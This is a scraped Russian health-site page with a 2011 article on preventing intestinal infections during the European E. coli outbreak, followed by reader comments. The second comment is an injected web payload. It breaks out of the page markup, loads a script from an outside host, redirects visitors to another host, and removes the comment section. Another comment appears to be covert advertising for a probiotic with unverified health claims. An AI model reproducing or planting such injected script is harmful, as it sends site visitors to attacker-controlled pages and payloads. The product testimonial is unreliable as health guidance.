Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Профилактика кишечных инф...  >>  Профилактика кишечных инфекций
 
Обратная связь
 

Профилактика кишечных инфекций

Размер шрифта
07 июня 2011 00:01
  • google_analytics: false
  • Нравится

Тема номер один для всех в июне – вспышка кишечных заболеваний в Европе. Виновники – то ли огурцы из Испании, то ли, по последней информации, бобы из Гамбурга. Что же делать, если свежие овощи попали под подозрение, а обеспечить себя витаминами на зиму все-таки и хочется, и надо?

Профилактика кишечных инфекций

Александр Бирюзов / «Здоровье-инфо»

Недавняя вспышка кишечной инфекции в Германии примечательна тем, что породила целую волну паники и слухов в обществе, и без того насыщенном ненаучной мифологией. Нет никаких оснований считать выявленную инфекцию новой, малоисследованной или особо опасной. Дело том, что причиной всех эпизодов заболевания явилась всем известная кишечная палочка. Этот микроорганизм спокойно существует в кишечнике человека и теплокровных животных. Источник кишечной палочки – это всегда фекалии. Кишечная палочка, или, как любят ее именовать журналисты по-латыни, Escherichia coli, которая убила 17 человек в Европе, на этот раз отличается особой патогенностью. Инфицирование сопровождается тяжелейшей интоксикацией, кровавым поносом и лихорадкой. Но появление такого штамма бактерий не является сенсацией, потому что мутации среди микроорганизмов происходят постоянно, и новые штаммы возникают довольно часто. А распространение кишечных инфекций досконально изучено уже более 100 лет назад, и с тех пор ничего существенно не поменялось.

Профилактика кишечных инфекций

Неслучайно кишечные инфекции прозвали «болезнями грязных рук». Заражение человека происходит при несоблюдении простых и непреложных правил личной гигиены:

  1. Чистым должно быть все, через что осуществляется контакт с пищей. После каждого посещения туалета, контакта с землей или мусором, а также после любого возможного загрязнения руки надо мыть с мылом, в проточной воде. В обязательном порядке мытье рук должно быть перед каждым приемом пищи. Столовые приборы, посуду, разделочные доски также необходимо тщательно мыть, а также поддерживать чистоту полотенец. Отдельные меры стоит предпринимать против насекомых и грызунов как потенциальных источников инфекции в месте приготовления и употребления пищи.

  2. Тщательное мытье продуктов не заменяет тепловую обработку. Животные продукты должны обязательно проходить термическую обработку температурой не ниже 70⁰С. Стандарт нагрева – кипячение. Тщательная жарка и варка продуктов – единственный способ уничтожить возможную микрофлору в продуктах питания. Термическая обработка убивает инфекционных возбудителей, но не разрушает вырабатываемые ими токсины. Поэтому пища с признаками порчи не употребляется даже после варки.
  3. Продукты, прошедшие термическую обработку, не должны контактировать с сырыми. Не следует также смешивать разделочные доски для этих групп продуктов, а также посуду и приборы. Храните отдельно, или хотя бы изолированно от других, все мясные и морские продукты.
  4. Температура камеры холодильника не выше 5 градусов обеспечивает замедление размножения микроорганизмов, но не прекращает его полностью. Поэтому даже в холодильнике содержимое необходимо регулярно проверять на предмет сохранности и срока годности. Не употребляйте продукты с истекшим сроком хранения. Это простое, но обязательное правило. Что касается уже приготовленной пищи, то она не хранится при комнатной температуре больше 2 часов – ее следует либо охладить, либо употребить.
  5. ВОДА ДЛЯ ПИТЬЯ И ПРИГОТОВЛЕНИЯ ПИЩИ ПОДВЕРГАЕТСЯ ОБЯЗАТЕЛЬНОМУ КИПЯЧЕНИЮ! Источник воды охраняется от попадания мусора и нечистот. При централизованном водоснабжении кипячение не отменяется. При отсутствии единой канализационной системы отхожие ямы и сборники нечистот организуются за пределами жилья.
  6. Не купайтесь в водоемах, в которые могут попасть экскременты животных и человека.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - bogdanova

16 августа 2014 в 06:49

Цитировать   |   Пожаловаться

А, я мама достаточно запарная, в хорошем смысле этого слова). Мне вообще, сложно представить, что возможно поехать в поездку без нормально сформированной аптечки. Есть перечень, без которого я ни в какую поездку никогда не отправлюсь. Жаропонижающие, болеутоляющие, средства от аллергии, пластырь, с момента прошлой поездки энтеросгель включила в этот список. Отдыхали в Турции, вроде бы в хорошем отеле, но видимо, что-то не свежее съели. Итог -отравились. Хорошо, хоть у одной из моих знакомых мам (тоже туристок, как раз этот сорбент в аптечки оказался). Так, вот меньше чем за день в чувства привел. Ну и градусник конечно. Ну, это так, основное. Еще в зависимости от времени года, могу еще чем-либо дополнять. А, за ваши советы отдельное спасибо. Буду внимательнее к санитарным условиям относиться.

2 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

3 - Гость

16 ноября 2016 в 09:31

Цитировать   |   Пожаловаться

bogdanova 16 августа 2014 в 06:49
Мне вообще, сложно представить, что возможно поехать в поездку без нормально сформированной аптечки.
 

Да, без хорошо сформированной аптечки ездить не стоит, чтобы не бегать потом в поисках необходимых лекарств по незнакомому городу. Мы с мужем тоже один раз отравились на отдых, правда, не до кровавой рвоты, но пару дней отдыха пропустили, бегая от постели до туалета и обратно. С тех пор берем все необходимое с собой, и стараемся кушать побольше полезных продуктов. Часто делаем домашний йогурт из деревенского молочка. А недавно в одной группе посоветовали отличную вещь – пробиотик Здоровье от фирмы Бакздрав. Его можно употреблять практически с любой едой, мы иногда просто смешиваем с теплым чаем, только с алкоголем нельзя смешивать и со слишком горячим. Очень удобно, можно брать с собой, и даже в поездке или на отдыхе добавлять к меню. Мы пользуемся таким пробиотиком уже около полугода, примерно за три-четыре недели пищеварение наладилось. Перестала беспокоить вечная изжога и стул как по расписанию.

Я считаю, что нормальное пищеварение - залог здоровья, часто проблемы с желудком портят все настроение, а к здоровому человеку меньше всякая «кака» цепляется. Кстати, там какие-то специальные составляющие, которые помогают улучшить и укрепить иммунитет. Если больше привыкли, то можно и с готовым йогуртом, кефиром и другой кисломолочкой смешивать.

Статьи

       
Они съедают нас заживо. Паразиты   Как не поносить после курицы   Что делает гастроэнтеролог, если у него запор   Рак кишечника: меньше знаешь, крепче спишь?  
09 августа 2011Россия возобновляет импорт европейских овощей со вторника 22 июля 2011Россия снимает запрет на ввоз овощей из Италии и Венгрии
 
02 июня 2011Россия ввела полный запрет на овощи из Европы 11 февраля 2013Диагноз «колоректальный рак» можно поставить по дыханию
 

Слайдшоу

Самая населенная часть тела Можно ли защитить ребенка от микробов
Вся правда о запоре Лучшие специи. Часть 1
Вместилище души    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.